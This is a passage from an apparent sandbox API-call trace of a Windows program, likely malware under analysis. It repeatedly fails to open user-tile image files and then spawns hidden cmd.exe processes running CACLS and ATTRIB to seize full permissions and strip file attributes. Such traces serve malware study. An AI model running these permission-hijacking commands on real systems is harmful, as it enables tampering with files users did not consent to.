(hMutex=0xf8) returned 1 [0186.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] ReleaseMutex (hMutex=0xf8) returned 1 [0186.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.141] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.142] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", lpFilePart=0x12eab4*="usertile27.bmp") returned 0x52 [0186.142] GetLastError () returned 0x5 [0186.142] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.142] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.142] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.142] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.142] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.142] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.142] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.142] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.142] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.142] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.142] ReleaseMutex (hMutex=0xf8) returned 1 [0186.143] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.143] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", lpFilePart=0x12eab4*="usertile28.bmp") returned 0x52 [0186.143] GetLastError () returned 0x5 [0186.143] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.143] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.143] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.143] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.143] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.143] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.143] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0186.143] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.143] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf74, dwThreadId=0xf80)) returned 1 [0186.145] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] CloseHandle (hObject=0x1b4) returned 1 [0186.467] CloseHandle (hObject=0x120) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.467] ReleaseMutex (hMutex=0xf8) returned 1 [0186.467] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.468] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", lpFilePart=0x12eab4*="usertile28.bmp") returned 0x52 [0186.468] GetLastError () returned 0x5 [0186.468] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.468] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.468] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.468] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.468] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.468] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.468] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.468] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.468] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 [0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 [0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 [0186.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.468] ReleaseMutex (hMutex=0xf8) returned 1 [0186.468] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.469] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", lpFilePart=0x12eab4*="usertile29.bmp") returned 0x52 [0186.469] GetLastError () returned 0x5 [0186.469] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.469] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.469] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.469] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.469] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.469] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.469] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0186.469] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.469] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x128, dwThreadId=0xef4)) returned 1 [0186.471] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.771] CloseHandle (hObject=0x1b4) returned 1 [0186.771] CloseHandle (hObject=0x120) returned 1 [0186.771] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.772] ReleaseMutex (hMutex=0xf8) returned 1 [0186.772] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.772] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", lpFilePart=0x12eab4*="usertile29.bmp") returned 0x52 [0186.772] GetLastError () returned 0x5 [0186.772] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.772] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.772] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.772] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.772] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.772] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.773] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.773] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.773] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.773] ReleaseMutex (hMutex=0xf8) returned 1 [0186.773] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.773] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", lpFilePart=0x12eab4*="usertile30.bmp") returned 0x52 [0186.773] GetLastError () returned 0x5 [0186.773] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0186.773] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.773] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.773] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.773] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.773] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.774] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0186.774] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0186.774] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xfac, dwThreadId=0xd68)) returned 1 [0186.775] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] CloseHandle (hObject=0x1b4) returned 1 [0186.993] CloseHandle (hObject=0x120) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.993] ReleaseMutex (hMutex=0xf8) returned 1 [0186.993] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.993] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", lpFilePart=0x12eab4*="usertile30.bmp") returned 0x52 [0186.994] GetLastError () returned 0x5 [0186.994] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.994] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.994] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.994] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.994] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.994] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.994] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.994] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0186.994] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0186.994] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.994] ReleaseMutex (hMutex=0xf8) returned 1 [0186.994] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.994] ReleaseMutex (hMutex=0xf8) returned 1 [0186.995] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.995] ReleaseMutex (hMutex=0xf8) returned 1 [0186.995] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0186.995] ReleaseMutex (hMutex=0xf8) returned 1 [0186.995] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.996] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", lpFilePart=0x12eab4*="usertile31.bmp") returned 0x52 [0186.996] GetLastError () returned 0x5 [0186.996] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0186.996] LocalFree (hMem=0x1c6cc8) returned 0x0 [0186.996] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0186.996] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0186.996] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.997] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0186.997] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") 